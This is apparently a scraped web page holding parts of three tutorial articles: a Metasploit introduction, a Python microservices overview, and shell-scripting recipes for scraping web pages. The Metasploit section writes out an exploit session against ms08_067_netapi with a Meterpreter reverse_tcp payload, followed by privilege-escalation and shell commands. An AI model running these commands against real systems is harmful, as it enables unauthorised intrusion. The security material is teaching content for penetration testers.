We have many types of modules in Metasploit, and they differ regarding their functionality. We have payload modules for creating access channels to exploited systems. We have auxiliary modules to carry out operations such as information gathering, fingerprinting, fuzzing an application, and logging into various services. Let's examine the basic functionality of these modules, as follows:

Payloads: Payloads are used to carry out operations such as connecting to or from the target system after exploitation, or performing a particular task such as installing a service, and so on. Payload execution is the next step after the system is exploited successfully.
Auxiliary: Auxiliary modules are a special kind of module that performs specific tasks such as information gathering, database fingerprinting, scanning the network to find a particular service, enumeration, and so on.
Encoders: Encoders are used to encode payloads and attack vectors to (or intending to) evade detection by antivirus solutions or firewalls.
NOPs: NOP generators are used for alignment, which results in making exploits stable.
Exploits: The actual code that triggers a vulnerability.

Metasploit framework console and commands

Having gathered knowledge of the architecture of Metasploit, let us now run Metasploit to get hands-on knowledge of the commands and the different modules. To start Metasploit, we first need to establish a database connection so that everything we do can be logged into the database. However, usage of databases also speeds up Metasploit's load time by making use of cache and indexes for all modules. 
Therefore, let us start the postgresql service by typing in the following command at the terminal:

root@beast:~# service postgresql start

Now, to initialize Metasploit's database, let us initialize msfdb as shown in the following screenshot: It is clearly visible in the preceding screenshot that we have successfully created the initial database schema for Metasploit. Let us now start Metasploit's database using the following command:

root@beast:~# msfdb start

We are now ready to launch Metasploit. Let us issue msfconsole in the terminal to start Metasploit, as shown in the following screenshot: Welcome to the Metasploit console. Let us run the help command to see what other commands are available to us: The commands in the preceding screenshot are core Metasploit commands, which are used to set/get variables, load plugins, route traffic, unset variables, print the version, find the history of commands issued, and much more. These commands are pretty general. Let's see module-based commands, as follows: Everything related to a particular module in Metasploit comes under the module controls section of the help menu. Using the preceding commands, we can select a particular module, load modules from a particular path, get information about a module, show core and advanced options related to a module, and even edit a module inline. 
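Before examining each command individually, the following transcript sketches how a typical exploitation session strings the basic commands together. This is my illustrative addition: the module, payload and addresses are taken from the examples in the command reference below, and the `=>` confirmation lines are what msfconsole would echo back:

```
msf > use exploit/windows/smb/ms08_067_netapi
msf(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf(ms08_067_netapi) > set RHOST 192.168.10.112
RHOST => 192.168.10.112
msf(ms08_067_netapi) > set LHOST 192.168.10.118
LHOST => 192.168.10.118
msf(ms08_067_netapi) > check
msf(ms08_067_netapi) > exploit
```

The pattern is always the same: select a module with use, configure it with set (or setg for values shared across modules), optionally verify with check, and launch with run or exploit.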
Let us learn some basic commands in Metasploit and familiarize ourselves with their syntax and semantics:

use [auxiliary/exploit/payload/encoder]: To select a particular module. Examples: msf> use exploit/unix/ftp/vsftpd_234_backdoor, msf> use auxiliary/scanner/portscan/tcp
show [exploits/payloads/encoder/auxiliary/options]: To see the list of available modules of a particular type. Examples: msf> show payloads, msf> show options
set [options/payload]: To set a value for a particular object. Examples: msf> set payload windows/meterpreter/reverse_tcp, msf> set LHOST 192.168.10.118, msf> set RHOST 192.168.10.112, msf> set LPORT 4444, msf> set RPORT 8080
setg [options/payload]: To assign a value to a particular object globally, so the value does not change when a module is switched. Example: msf> setg RHOST 192.168.10.112
run: To launch an auxiliary module after all the required options are set. Example: msf> run
exploit: To launch an exploit. Example: msf> exploit
back: To unselect a module and move back. Example: msf(ms08_067_netapi)> back
info: To list the information related to a particular exploit/module/auxiliary. Examples: msf> info exploit/windows/smb/ms08_067_netapi, msf(ms08_067_netapi)> info
search: To find a particular module. Example: msf> search hfs
check: To check whether a particular target is vulnerable to the exploit or not. Example: msf> check
sessions: To list the available sessions. Example: msf> sessions [session number]

The following are some useful Meterpreter commands:

sysinfo: To list the system information of the compromised host. Example: meterpreter> sysinfo
ifconfig: To list the network interfaces on the compromised host. Examples: meterpreter> ifconfig, meterpreter> ipconfig (Windows)
arp: To list the IP and MAC addresses of hosts connected to the target. Example: meterpreter> arp
background: To send an active session to the background. Example: meterpreter> background
shell: To drop a cmd shell on the target. Example: meterpreter> shell
getuid: To get the current user details. Example: meterpreter> getuid
getsystem: To escalate privileges and gain system access. Example: meterpreter> getsystem
getpid: To get the process ID of the Meterpreter session. Example: meterpreter> getpid
ps: To list all the processes running on the target. Example: meterpreter> ps

If you are using Metasploit for the very first time, refer to http://www.offensive-security.com/metasploit-unleashed/Msfconsole_Commands for more information on basic commands.

Benefits of using Metasploit

Metasploit is an excellent choice when compared to traditional manual techniques because of certain factors, which are listed as follows:

The Metasploit framework is open source.
Metasploit supports large testing networks by making use of CIDR identifiers.
Metasploit offers quick generation of payloads, which can be changed or switched on the fly.
Metasploit leaves the target system stable in most cases.
The GUI environment provides a fast and user-friendly way to conduct penetration testing.

Summary

Throughout this article, we learned the basics of Metasploit. We learned about the syntax and semantics of various Metasploit commands. We also learned the benefits of using Metasploit.

Resources for Article:
Further resources on this subject:
Approaching a Penetration Test Using Metasploit [article]
Metasploit Custom Modules and Meterpreter Scripting [article]
So, what is Metasploit? [article]

Packt
22 Jun 2017
19 min read

Understanding Microservices

This article by Tarek Ziadé, author of the book Python Microservices Development, explains the benefits and implementation of microservices with Python. While the microservices architecture looks more complicated than its monolithic counterpart, its advantages are multiple. It offers the following benefits.

Separation of concerns

First of all, each microservice can be developed independently by a separate team. For instance, building a reservation service can be a full project on its own. The team in charge can build it with whatever programming language and database they choose, as long as it has a well-documented HTTP API. That also means the evolution of the app is more under control than with monoliths. For example, if the payment system changes its underlying interactions with the bank, the impact is localized inside that service and the rest of the application stays stable and under control. This loose coupling greatly improves overall project velocity, because we are applying at the service level a philosophy similar to the single responsibility principle. The single responsibility principle was defined by Robert Martin to explain that a class should have only one reason to change; in other words, each class should provide a single, well-defined feature. Applied to microservices, it means that we want to make sure that each microservice focuses on a single role.

Smaller projects

The second benefit is breaking down the complexity of the project. When you are adding a feature to an application, such as PDF reporting, even if you are doing it cleanly, you are making the code base bigger, more complicated, and sometimes slower. Building that feature in a separate application avoids this problem, and makes it easier to write it with whatever tools you want. You can refactor it often, shorten your release cycles, and stay on top of things. The growth of the application remains under your control.
Dealing with a smaller project also reduces risks when improving the application: if a team wants to try out the latest programming language or framework, they can iterate quickly on a prototype that implements the same microservice API, try it out, and decide whether or not to stick with it. One real-life example is the Firefox Sync storage microservice. There are currently some experiments to switch from the current Python+MySQL implementation to a Go-based one that stores user data in standalone SQLite databases. That prototype is highly experimental, but since we have isolated the storage feature in a microservice with a well-defined HTTP API, it's easy enough to give it a try with a small subset of the user base.

Scaling and deployment

Lastly, having your application split into components makes it easier to scale depending on your constraints. Let's say you are starting to get a lot of customers who are booking hotels daily, and the PDF generation is starting to heat up the CPUs. You can deploy that specific microservice on some servers that have bigger CPUs. Another typical example is RAM-consuming microservices, like the ones that interact with in-memory databases like Redis or Memcache. You could tweak your deployments accordingly by deploying them on servers with less CPU and a lot more RAM. To summarize, microservices offer the following benefits:

- A team can develop each microservice independently, and use whatever technological stack makes sense. They can define a custom release cycle. The tip of the iceberg is the language-agnostic HTTP API.
- Developers break the application complexity into logical components. Each microservice focuses on doing one thing well.
- Since microservices are standalone applications, there's finer control over deployments, which makes scaling easier.

Microservices architectures are good at solving a lot of the problems that may arise once your application starts to grow.
However, we need to be aware of some of the new issues they also bring in practice.

Implementing microservices with Python

Python is an amazingly versatile language. As you probably already know, it's used to build many different kinds of applications, from simple system scripts that perform tasks on a server, to large object-oriented applications that run services for millions of users. According to a study conducted by Philip Guo in 2014, published on the Association for Computing Machinery (ACM) website, Python has surpassed Java in top U.S. universities and is the most popular language for learning computer science. This trend is also true in the software industry. Python now sits in the top 5 languages of the TIOBE index (http://www.tiobe.com/tiobe-index/), and it's probably even bigger in the web development world, since languages like C are rarely used as main languages to build web applications. However, some developers criticize Python for being slow and unfit for building efficient web services. Python is slow, and this is undeniable. But it still is a language of choice for building microservices, and many major companies are happily using it. This section will give you some background on the different ways you can write microservices using Python, some insights on asynchronous versus synchronous programming, and conclude with some details on Python performance. It's composed of five parts:

- The WSGI standard
- Greenlet & Gevent
- Twisted & Tornado
- asyncio
- Language performances

The WSGI standard

What strikes most web developers starting with Python is how easy it is to get a web application up and running. The Python web community has created a standard inspired by the Common Gateway Interface (CGI), called the Web Server Gateway Interface (WSGI), that greatly simplifies writing a Python application whose goal is to serve HTTP requests.
When your code is using that standard, your project can be executed by standard web servers like Apache or nginx, using WSGI extensions like uwsgi or mod_wsgi. Your application just has to deal with incoming requests and send back JSON responses, and Python includes all that goodness in its standard library. You can create a fully functional microservice that returns the server's local time with a vanilla Python module of fewer than ten lines:

import json
import time

def application(environ, start_response):
    headers = [('Content-type', 'application/json')]
    start_response('200 OK', headers)
    return [bytes(json.dumps({'time': time.time()}), 'utf8')]

Since its introduction, the WSGI protocol became an essential standard and the Python web community widely adopted it. Developers wrote middlewares, which are functions you can hook before or after the WSGI application function itself, to do something within the environment. Some web frameworks were created specifically around that standard, like Bottle (http://bottlepy.org), and soon enough, every framework out there could be used through WSGI in one way or another. The biggest problem with WSGI, though, is its synchronous nature. The application function you see above is called exactly once per incoming request, and when the function returns, it has to send back the response. That means that every time you call the function, it will block until the response is ready. And writing microservices means your code will be waiting for responses from various network resources all the time. In other words, your application will idle and just block the client until everything is ready. That's an entirely okay behavior for HTTP APIs. We're not talking about building bidirectional applications like WebSocket-based ones. But what happens when you have several incoming requests that are calling your application at the same time? WSGI servers will let you run a pool of threads to serve several requests concurrently.
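That thread-pool behavior and its limits can be simulated with the standard library's concurrent.futures module: four blocking handlers served by a pool of two threads must run in two batches. This is a sketch, not WSGI-specific code; the sleep stands in for a slow backend call, and the names are illustrative:

```python
import time
from concurrent.futures import ThreadPoolExecutor

def blocking_handler(request_id):
    # Stands in for a WSGI application waiting on a backend service.
    time.sleep(0.1)
    return request_id

start = time.monotonic()
with ThreadPoolExecutor(max_workers=2) as pool:
    results = list(pool.map(blocking_handler, range(4)))
elapsed = time.monotonic() - start

print(results)          # [0, 1, 2, 3]
# Four blocking requests on two threads need at least two batches,
# so the total time is roughly 0.2s rather than 0.1s.
print(elapsed >= 0.15)  # True
```

A bigger pool hides the problem only until the pool is exhausted, which is exactly the limitation discussed next.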
But you can't run thousands of them, and as soon as the pool is exhausted, the next request will be blocked even if your microservice is doing nothing but idling and waiting for backend services' responses. That's one of the reasons why non-WSGI frameworks like Twisted and Tornado, and, in the JavaScript world, Node.js, became very successful: they are fully asynchronous. When you're coding a Twisted application, you can use callbacks to pause and resume the work done to build a response. That means you can accept new requests and start to process them. That model dramatically reduces the idling time in your process. It can serve thousands of concurrent requests. Of course, that does not mean the application will return each individual response faster. It just means one process can accept more concurrent requests and juggle between them as the data is getting ready to be sent back. There's no simple way with the WSGI standard to introduce something similar, and the community has debated for years to come up with a consensus - and failed. The odds are that the community will eventually drop the WSGI standard for something else. In the meantime, building microservices with synchronous frameworks is still possible and completely fine, if your deployments take into account the one request == one thread limitation of the WSGI standard. There's, however, one trick to boost synchronous web applications: greenlets.

Greenlet & Gevent

The general principle of asynchronous programming is that the process deals with several concurrent execution contexts to simulate parallelism. Asynchronous applications use an event loop that pauses and resumes execution contexts when an event is triggered: only one context is active at a time, and they take turns. An explicit instruction in the code tells the event loop where it can pause the execution. When that occurs, the process will look for some other pending work to resume.
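This pause-and-resume principle can be sketched with plain Python generators, where yield plays the role of the explicit pause point. This is only an analogy using the standard library, not how Greenlet is implemented:

```python
def worker(name, steps):
    for i in range(steps):
        # yield is the explicit "pause": control goes back to the loop
        yield f'{name} step {i}'

# A tiny round-robin "event loop" over two pseudo-threads.
contexts = [worker('A', 2), worker('B', 2)]
trace = []
while contexts:
    ctx = contexts.pop(0)
    try:
        trace.append(next(ctx))
        contexts.append(ctx)  # re-queue: it resumes where it paused
    except StopIteration:
        pass                  # this context is finished

print(trace)  # ['A step 0', 'B step 0', 'A step 1', 'B step 1']
```

Each context runs until its next pause point, then another one takes over, which is exactly the switching behavior described here.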
Eventually, the process will come back to your function and continue it where it stopped; moving from one execution context to another is called switching. The Greenlet project (https://github.com/python-greenlet/greenlet) is a package based on the Stackless project, a particular CPython implementation, and provides greenlets. Greenlets are pseudo-threads that are very cheap to instantiate, unlike real threads, and that can be used to call Python functions. Within those functions, you can switch and give back the control to another function. The switching is done with an event loop and allows you to write an asynchronous application using a thread-like interface paradigm. Here's an example adapted from the Greenlet documentation, updated for Python 3:

from greenlet import greenlet

def test1(x, y):
    z = gr2.switch(x + y)
    print(z)

def test2(u):
    print(u)
    gr1.switch(42)

gr1 = greenlet(test1)
gr2 = greenlet(test2)
gr1.switch("hello", " world")

The two greenlets are explicitly switching from one to the other. For building microservices based on the WSGI standard, if the underlying code used greenlets, we could accept several concurrent requests and just switch from one to another when we know a call is going to block the request, like performing a SQL query. However, switching from one greenlet to another has to be done explicitly, and the resulting code can quickly become messy and hard to understand. That's where Gevent can become very useful. The Gevent project (http://www.gevent.org/) is built on top of Greenlet and offers, among other things, an implicit and automatic way of switching between greenlets. It provides a cooperative version of the socket module that will use greenlets to automatically pause and resume the execution when some data is made available in the socket. There's even a monkey-patch feature that will automatically replace the standard library socket with Gevent's version. That makes your standard synchronous code magically asynchronous every time it uses sockets - with just one extra line:
from gevent import monkey; monkey.patch_all()

def application(environ, start_response):
    headers = [('Content-type', 'application/json')]
    start_response('200 OK', headers)
    # ...do something with sockets here...
    return result

This implicit magic comes with a price, though. For Gevent to work well, all the underlying code needs to be compatible with the patching Gevent is doing. Some packages from the community will continue to block, or even have unexpected results, because of this; in particular, this happens if they use C extensions and bypass some of the features of the standard library that Gevent patched. But for most cases, it works well. Projects that play well with Gevent are dubbed "green," and when a library is not functioning well and the community asks its authors to "make it green," it usually happens. That's what was used to scale the Firefox Sync service at Mozilla, for instance.

Twisted and Tornado

If you are building microservices where increasing the number of concurrent requests you can hold is important, it's tempting to drop the WSGI standard and just use an asynchronous framework like Tornado (http://www.tornadoweb.org/) or Twisted (https://twistedmatrix.com/trac/). Twisted has been around for ages.
To implement the same microservice, you need to write slightly more verbose code:

import json
import time

from twisted.web import server, resource
from twisted.internet import reactor, endpoints

class Simple(resource.Resource):
    isLeaf = True

    def render_GET(self, request):
        request.responseHeaders.addRawHeader(b"content-type",
                                             b"application/json")
        return bytes(json.dumps({'time': time.time()}), 'utf8')

site = server.Site(Simple())
endpoint = endpoints.TCP4ServerEndpoint(reactor, 8080)
endpoint.listen(site)
reactor.run()

While Twisted is an extremely robust and efficient framework, it suffers from a few problems when building HTTP microservices:

- You need to implement each endpoint in your microservice with a class derived from a Resource class, and implement each supported method. For a few simple APIs, it adds a lot of boilerplate code.
- Twisted code can be hard to understand and debug due to its asynchronous nature. It's easy to fall into callback hell when you're chaining too many functions that get triggered successively one after the other, and the code can get messy.
- Properly testing your Twisted application is hard, and you have to use a Twisted-specific unit testing model.

Tornado is based on a similar model, but does a better job in some areas. It has a lighter routing system and does everything possible to make the code closer to plain Python. Tornado also uses a callback model, so debugging can be hard. But both frameworks are working hard at bridging the gap to rely on the new async features introduced in Python 3.

asyncio

When Guido van Rossum started to work on adding async features in Python 3, part of the community pushed for a Gevent-like solution, because it made a lot of sense to write applications in a synchronous, sequential fashion rather than having to add explicit callbacks like in Tornado or Twisted. But Guido picked the explicit technique and experimented in a project called Tulip, which Twisted inspired.
Eventually, asyncio was born out of that side project and added into Python. In hindsight, implementing an explicit event loop mechanism in Python instead of going the Gevent way makes a lot of sense. The way the Python core developers coded asyncio, and how they elegantly extended the language with the async and await keywords to implement coroutines, made asynchronous applications built with vanilla Python 3.5+ code look very elegant and close to synchronous programming. By doing this, Python did a great job at avoiding the callback syntax mess we sometimes see in Node.js or Twisted (Python 2) applications. And beyond coroutines, Python 3 has introduced a full set of features and helpers in the asyncio package to build asynchronous applications; see https://docs.python.org/3/library/asyncio.html. Python is now as expressive as languages like Lua for creating coroutine-based applications, and there are now a few emerging frameworks that have embraced those features and will only work with Python 3.5+ to benefit from this. KeepSafe's aiohttp (http://aiohttp.readthedocs.io) is one of them, and building the same microservice, fully asynchronous, with it would simply take these few elegant lines:

from aiohttp import web
import time

async def handle(request):
    return web.json_response({'time': time.time()})

if __name__ == '__main__':
    app = web.Application()
    app.router.add_get('/', handle)
    web.run_app(app)

In this small example, we're very close to how we would implement a synchronous app. The only hint that we're async is the async keyword, marking the handle function as a coroutine. And that's what's going to be used at every level of an async Python app going forward. Here's another example using aiopg, a PostgreSQL library for asyncio.
From the project documentation:

import asyncio
import aiopg

dsn = 'dbname=aiopg user=aiopg password=passwd host=127.0.0.1'

async def go():
    pool = await aiopg.create_pool(dsn)
    async with pool.acquire() as conn:
        async with conn.cursor() as cur:
            await cur.execute("SELECT 1")
            ret = []
            async for row in cur:
                ret.append(row)
            assert ret == [(1,)]

loop = asyncio.get_event_loop()
loop.run_until_complete(go())

With a few async and await prefixes, the function that performs a SQL query and sends back the result looks a lot like a synchronous function. But asynchronous frameworks and libraries based on Python 3 are still emerging, and if you are using asyncio or a framework like aiohttp, you will need to stick with particular asynchronous implementations for each feature you need. If you need to use a library that is not asynchronous in your code, using it from your asynchronous code means you will need to go through some extra and challenging work if you want to prevent blocking the event loop. If your microservices are dealing with a limited number of resources, it could be manageable. But it's probably a safer bet at this point (2017) to stick with a synchronous framework that's been around for a while rather than an asynchronous one. Let's enjoy the existing ecosystem of mature packages, and wait until the asyncio ecosystem gets more sophisticated. And there are many great synchronous frameworks to build microservices with Python, like Bottle, Pyramid with Cornice, or Flask.

Language performances

In the previous sections, we've been through the two different ways to write microservices: asynchronous versus synchronous. Whatever technique you use, the speed of Python directly impacts the performance of your microservice. Of course, everyone knows Python is slower than Java or Go, but execution speed is not always the top priority.
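When raw interpreter speed does matter, it can be measured rather than guessed. The standard library's timeit module makes this easy; the following sketch compares a hand-written loop with the C-implemented sum builtin (absolute numbers depend on the machine, only the relative ordering is meaningful):

```python
import timeit

# A hand-written loop pays interpreter overhead on every iteration...
loop_stmt = """
total = 0
for i in range(1000):
    total += i
"""
loop_time = timeit.timeit(loop_stmt, number=1000)

# ...while the C-implemented builtin does the same work in one call.
builtin_time = timeit.timeit('sum(range(1000))', number=1000)

print(builtin_time < loop_time)  # True on CPython
```

Pushing hot loops down into C-implemented builtins or libraries is often the cheapest way to claw back performance before reaching for a different interpreter.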
A microservice is often a thin layer of code that spends most of its life waiting for network responses from other services. Its core speed is usually less important than how long your SQL queries take to return from your Postgres server, because the latter will represent most of the time spent building the response. But wanting an application that's as fast as possible is legitimate. One controversial topic in the Python community around speeding up the language is how the Global Interpreter Lock (GIL) mutex can ruin performance, because multi-threaded applications cannot effectively use several cores. The GIL has good reasons to exist. It protects non-thread-safe parts of the CPython interpreter, and exists in other languages like Ruby. And all attempts to remove it so far have failed to produce a faster CPython implementation. Larry Hastings is working on a GIL-free CPython project called Gilectomy (https://github.com/larryhastings/gilectomy); its minimal goal is to come up with a GIL-free implementation that can run a single-threaded application as fast as CPython. As of today (2017), this implementation is still slower than CPython. But it's interesting to follow this work and see if it reaches speed parity one day. That would make a GIL-free CPython very appealing. For microservices, besides preventing the usage of multiple cores in the same process, the GIL will slightly degrade performance under high load, because of the system call overhead introduced by the mutex. However, all the scrutiny around the GIL has had one beneficial impact: some work has been done in the past years to reduce its contention in the interpreter, and in some areas, Python's performance has improved a lot. But bear in mind that even if the core team removed the GIL, Python is an interpreted language and the produced code will never be very efficient at execution time. Python provides the dis module if you are interested in seeing how the interpreter decomposes a function.
In the example below, the interpreter will decompose a simple function that yields incremented values from a sequence in no less than 29 steps!

>>> def myfunc(data):
...     for value in data:
...         yield value + 1
...
>>> import dis
>>> dis.dis(myfunc)
  2           0 SETUP_LOOP              23 (to 26)
              3 LOAD_FAST                0 (data)
              6 GET_ITER
        >>    7 FOR_ITER                15 (to 25)
             10 STORE_FAST               1 (value)
  3          13 LOAD_FAST                1 (value)
             16 LOAD_CONST               1 (1)
             19 BINARY_ADD
             20 YIELD_VALUE
             21 POP_TOP
             22 JUMP_ABSOLUTE            7
        >>   25 POP_BLOCK
        >>   26 LOAD_CONST               0 (None)
             29 RETURN_VALUE

A similar function written in a statically compiled language will dramatically reduce the number of operations required to produce the same result. There are ways to speed up Python execution, though. One is to write part of your code as compiled code, by building C extensions or using a statically compiled extension of the language like Cython (http://cython.org/), but that makes your code more complicated. Another solution, which is the most promising one, is simply running your application with the PyPy interpreter (http://pypy.org/). PyPy implements a Just-In-Time (JIT) compiler. This compiler directly replaces, at run time, pieces of Python code with machine code that can be used directly by the CPU. The whole trick for the JIT is to detect, in real time and ahead of the execution, when and how to do it. Even if PyPy is always a few Python versions behind CPython, it has reached a point where you can use it in production, and its performance can be quite amazing. In one of our projects at Mozilla that needs fast execution, the PyPy version was almost as fast as the Go version, and we decided to use Python there instead. The PyPy Speed Center website is a great place to look at how PyPy compares to CPython: http://speed.pypy.org/. However, if your program uses C extensions, you will need to recompile them for PyPy, and that can be a problem, in particular if other developers maintain some of the extensions you are using.
But if you are building your microservice with a standard set of libraries, chances are that it will work out of the box with the PyPy interpreter, so that's worth a try. In any case, for most projects, the benefits of Python and its ecosystem largely surpass the performance issues described in this section, because the overhead in a microservice is rarely a problem.

Summary

In this article, we saw that Python is considered to be one of the best languages to write web applications, and therefore microservices; for the same reasons, it's a language of choice in other areas, and also because it provides tons of mature frameworks and packages to do the work.

Resources for Article:

Further resources on this subject:
Inbuilt Data Types in Python [article]
Getting Started with Python Packages [article]
Layout Management for Python GUI [article]

Packt
22 Jun 2017
20 min read

Tangled Web? Not At All!

In this article by Clif Flynt, the author of the book Linux Shell Scripting Cookbook - Third Edition, we see a collection of shell-scripting recipes that talk to services on the Internet. This article is intended to help readers understand how to interact with the Web using shell scripts to automate tasks such as collecting and parsing data from web pages. This is discussed using POST and GET requests to web pages, and by writing clients for web services. In this article, we will cover the following recipes:

- Downloading a web page as plain text
- Parsing data from a website
- Image crawler and downloader
- Web photo album generator
- Twitter command-line client
- Tracking changes to a website
- Posting to a web page and reading the response
- Downloading a video from the Internet

The Web has become the face of technology and the central access point for data processing. The primary interface to the web is via a browser that's designed for interactive use. That's great for searching and reading articles on the web, but you can also do a lot to automate your interactions with shell scripts. For instance, instead of checking a website daily to see if your favorite blogger has added a new blog, you can automate the check and be informed when there's new information. Similarly, Twitter is the current hot technology for getting up-to-the-minute information. But if I subscribe to my local newspaper's Twitter account because I want the local news, Twitter will send me all news, including high-school sports that I don't care about. With a shell script, I can grab the tweets and customize my filters to match my desires, not rely on their filters.

Downloading a web page as plain text

Web pages are simply text with HTML tags, JavaScript, and CSS. The HTML tags define the content of a web page, which we can parse for specific content. Bash scripts can parse web pages. An HTML file can be viewed in a web browser to see it properly formatted.
Parsing a text document is simpler than parsing HTML data because we aren't required to strip off the HTML tags. Lynx is a command-line web browser which can download a web page as plain text.

Getting ready

Lynx is not installed in all distributions, but is available via the package manager:

# yum install lynx

or:

# apt-get install lynx

How to do it...

Let's download the webpage view, in ASCII character representation, in a text file by using the -dump flag with the lynx command:

$ lynx URL -dump > webpage_as_text.txt

This command will list all the hyperlinks (<a href="link">) separately under a heading References, as the footer of the text output. This lets us parse links separately with regular expressions. For example:

$ lynx -dump http://google.com > plain_text_page.txt

You can see the plain-text version of the page by using the cat command:

$ cat plain_text_page.txt
   Search [1]Images [2]Maps [3]Play [4]YouTube [5]News [6]Gmail [7]Drive
   [8]More »
   [9]Web History | [10]Settings | [11]Sign in
   [12]St. Patrick's Day 2017
     _______________________________________________________
   Google Search   I'm Feeling Lucky   [13]Advanced search
                                       [14]Language tools
   [15]Advertising Programs   [16]Business Solutions   [17]+Google
   [18]About Google
   © 2017 - [19]Privacy - [20]Terms

References

Parsing data from a website

The lynx, sed, and awk commands can be used to mine data from websites.

How to do it...

Let's go through the commands used to parse details of actresses from the website:

$ lynx -dump -nolist http://www.johntorres.net/BoxOfficefemaleList.html |
    grep -o "Rank-.*" |
    sed -e 's/ *Rank-\([0-9]*\) *\(.*\)/\1\t\2/' |
    sort -nk 1 > actresslist.txt

The output is:

# Only 3 entries shown. All others omitted due to space limits
1   Keira Knightley
2   Natalie Portman
3   Monica Bellucci

How it works...

Lynx is a command-line web browser: it can dump a text version of a website as we would see it in a web browser, instead of returning the raw HTML as wget or cURL do. This saves the step of removing HTML tags.
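Where lynx is unavailable, a rough version of this tag-stripping step can also be sketched with Python's standard library html.parser module. This is only an illustration, not part of the recipe, and it does not reproduce lynx's formatting or its References footer:

```python
from html.parser import HTMLParser

class TextDumper(HTMLParser):
    """Collect the text content of a page, skipping script/style."""
    def __init__(self):
        super().__init__()
        self.chunks = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in ('script', 'style'):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ('script', 'style') and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip and data.strip():
            self.chunks.append(data.strip())

html = ('<html><head><style>b{}</style></head>'
        '<body><h1>Hello</h1><p>plain <b>text</b></p></body></html>')
parser = TextDumper()
parser.feed(html)
print(' '.join(parser.chunks))  # Hello plain text
```

In practice, the page source would be fetched first (for example, with urllib.request), then fed to the parser.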
The -nolist option shows the links without numbers. Parsing and formatting the lines that contain Rank is done with sed:

sed -e 's/ *Rank-\([0-9]*\) *\(.*\)/\1\t\2/'

These lines are then sorted according to the ranks.

See also

The Downloading a web page as plain text recipe in this article explains the lynx command.

Image crawler and downloader

Image crawlers download all the images that appear in a web page. Instead of going through the HTML page by hand to pick the images, we can use a script to identify the images and download them automatically.

How to do it...

This Bash script will identify and download the images from a web page:

#!/bin/bash
#Desc: Images downloader
#Filename: img_downloader.sh

if [ $# -ne 3 ]; then
    echo "Usage: $0 URL -d DIRECTORY"
    exit -1
fi

while [ -n "$1" ]
do
    case $1 in
    -d) shift; directory=$1; shift ;;
     *) url=$1; shift ;;
    esac
done

mkdir -p $directory
baseurl=$(echo $url | egrep -o "https?://[a-z.-]+")

echo Downloading $url
curl -s $url | egrep -o "<img src=[^>]*>" |
    sed 's/<img src="\([^"]*\).*/\1/g' |
    sed "s,^/,$baseurl/," > /tmp/$$.list

cd $directory

while read filename;
do
    echo Downloading $filename
    curl --silent -O "$filename"
done < /tmp/$$.list

An example usage is:

$ ./img_downloader.sh http://www.flickr.com/search/?q=linux -d images

How it works...

The image downloader script reads an HTML page, strips out all tags except <img>, parses src="URL" from the <img> tags, and downloads them to the specified directory. This script accepts a web page URL and the destination directory as command-line arguments. The [ $# -ne 3 ] statement checks whether the total number of arguments to the script is three; otherwise, it exits and prints a usage example. Otherwise, this code parses the URL and destination directory:

while [ -n "$1" ]
do
    case $1 in
    -d) shift; directory=$1; shift ;;
     *) url=${url:-$1}; shift ;;
    esac
done

The while loop runs until all the arguments are processed.
The shift command shifts arguments to the left so that $1 will take the next argument's value; that is, $2, and so on. Hence, we can evaluate all arguments through $1 itself. The case statement checks the first argument ($1). If that matches -d, the next argument must be a directory name, so the arguments are shifted and the directory name is saved. If the argument is any other string, it is a URL. The advantage of parsing arguments in this way is that we can place the -d argument anywhere in the command line:

$ ./img_downloader.sh -d DIR URL

Or:

$ ./img_downloader.sh URL -d DIR

The egrep -o "<img src=[^>]*>" code will print only the matching strings, which are the <img> tags including their attributes. The phrase [^>]* matches all the characters except the closing >, that is, <img src="image.jpg">. sed 's/<img src="\([^"]*\).*/\1/g' extracts the URL from the string src="url". There are two types of image source paths: relative and absolute. Absolute paths contain full URLs that start with http:// or https://. Relative URLs start with / or the image name itself. An example of an absolute URL is http://example.com/image.jpg. An example of a relative URL is /image.jpg. For relative URLs, the starting / should be replaced with the base URL to transform it to http://example.com/image.jpg. The script initializes the baseurl by extracting it from the initial URL with the command:

baseurl=$(echo $url | egrep -o "https?://[a-z.-]+")

The output of the previously described sed command is piped into another sed command to replace a leading / with the baseurl, and the results are saved in a file named for the script's PID: /tmp/$$.list.

sed "s,^/,$baseurl/," > /tmp/$$.list

The final while loop iterates through each line of the list and uses curl to download the images.
The --silent argument is used with curl to avoid extra progress messages from being printed on the screen.

Web photo album generator

Web developers frequently create photo albums of full-sized and thumbnail images. When a thumbnail is clicked, a large version of the picture is displayed. This requires resizing and placing many images. These actions can be automated with a simple Bash script. The script creates thumbnails, places them in exact directories, and generates the code fragment for <img> tags automatically.

Getting ready

This script uses a for loop to iterate over every image in the current directory. The usual Bash utilities such as cat and convert (from the ImageMagick package) are used. These will generate an HTML album, using all the images, in index.html.

How to do it...

This Bash script will generate an HTML album page:

#!/bin/bash
#Filename: generate_album.sh
#Description: Create a photo album using images in current directory

echo "Creating album.."
mkdir -p thumbs

cat <<EOF1 > index.html
<html>
<head>
<style>
body
{
    width:470px;
    margin:auto;
    border: 1px dashed grey;
    padding:10px;
}
img
{
    margin:5px;
    border: 1px solid black;
}
</style>
</head>
<body>
<center><h1> #Album title </h1></center>
<p>
EOF1

for img in *.jpg;
do
    convert "$img" -resize "100x" "thumbs/$img"
    echo "<a href=\"$img\" >" >> index.html
    echo "<img src=\"thumbs/$img\" title=\"$img\" /></a>" >> index.html
done

cat <<EOF2 >> index.html
</p>
</body>
</html>
EOF2

echo Album generated to index.html

Run the script as follows:

$ ./generate_album.sh
Creating album..
Album generated to index.html

How it works...
The initial part of the script is used to write the header part of the HTML page. The following script redirects all the contents up to EOF1 to index.html:

cat <<EOF1 > index.html
contents...
EOF1

The header includes the HTML and CSS styling. for img in *.jpg; do iterates over the file names and evaluates the body of the loop. convert "$img" -resize "100x" "thumbs/$img" creates images of 100 px width as thumbnails. The following statements generate the required <img> tag and append it to index.html:

echo "<a href=\"$img\">" >> index.html
echo "<img src=\"thumbs/$img\" title=\"$img\" /></a>" >> index.html

Finally, the footer HTML tags are appended with cat as done in the first part of the script.

Twitter command-line client

Twitter is the hottest micro-blogging platform, as well as the latest buzz of the online social media now. We can use the Twitter API to read tweets on our timeline from the command line! Let's see how to do it.

Getting ready

